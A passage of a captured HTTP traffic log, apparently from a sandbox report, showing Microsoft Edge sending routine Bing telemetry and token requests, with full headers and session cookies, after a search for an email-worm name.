cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df5ea
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df605
POST

https://www.bing.com/orgid/idtoken/conditional

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /orgid/idtoken/conditional HTTP/2.0
host: www.bing.com
content-length: 693
cache-control: max-age=0
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
origin: https://login.microsoftonline.com
upgrade-insecure-requests: 1
dnt: 1
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://login.microsoftonline.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
cookie: dsc=order=BingPages

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67d0f35085bd49d8a27add3883f15d55
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-xeaS6ZYQx0JKcHpJcCDYF2Dv87NQm1bV+vu8fP/Cjqg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: C692EDF0EE3D4C7CB16E068A1F4DAF2E Ref B: LTSEDGE1012 Ref C: 2025-03-12T02:37:04Z
date: Wed, 12 Mar 2025 02:37:04 GMT
set-cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E; expires=Mon, 06-Apr-2026 02:37:04 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df636
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22ARElementIndex%22%3A0%2C%22ARElementOffsetTop%22%3A16%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A648%2C%22ARElementHeight%22%3A200%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225169%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22ARElementIndex%22%3A1%2C%22ARElementOffsetTop%22%3A240%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A648%2C%22ARElementHeight%22%3A200%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225170%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22ARElementIndex%22%3A2%2C%22ARElementOffsetTop%22%3A16%2C%22ARElementOffsetLeft%22%3A672%2C%22ARElementWidth%22%3A536%2C%22ARElementHeight%22%3A424%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225171%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A0%2C%22AnswerCardKValue%22%3A%225169%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A1%2C%22AnswerCardKValue%22%3A%225171%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A2%2C%22AnswerCardKValue%22%3A%225170%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22ARElementIndex%22%3A0%2C%22ARElementOffsetTop%22%3A16%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A648%2C%22ARElementHeight%22%3A200%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225169%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22ARElementIndex%22%3A1%2C%22ARElementOffsetTop%22%3A240%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A648%2C%22ARElementHeight%22%3A200%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225170%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22ARElementIndex%22%3A2%2C%22ARElementOffsetTop%22%3A16%2C%22ARElementOffsetLeft%22%3A672%2C%22ARElementWidth%22%3A536%2C%22ARElementHeight%22%3A424%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225171%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A0%2C%22AnswerCardKValue%22%3A%225169%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A1%2C%22AnswerCardKValue%22%3A%225171%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%2C%7B%22AnswerCardVisibleIndex%22%3A2%2C%22AnswerCardKValue%22%3A%225170%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023204%2C%22Name%22%3A%22AnswerCardLoad%22%2C%22FID%22%3A%22Magazine%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df64b
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023457%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023457%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh

Response

HTTP/2.0 200

content-length: 1567
content-type: application/x-javascript
cache-control: public, max-age=15552000
content-encoding: br
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
vary: Accept-Encoding
x-eventid: 67d0998494cb4436a323a87cbdf59389
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-k4oYmK/CCaeGmnkwVA6dwhs8wjTq+5dpeg9EWlYAhB8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747024.32df666
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023457%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1741747023457%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
